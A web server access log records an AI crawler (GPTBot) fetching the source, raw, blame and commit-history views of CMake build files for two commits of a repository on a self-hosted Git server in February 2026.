"/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11165] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11828] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11827] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11271] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11273] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29810] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11195] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11194] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29810] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14639] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10076] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11311] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10075] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16049] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16048] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12012] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12010] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11021] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11022] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16401] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11518] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16402] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39741] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10177] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10181] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39741] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr 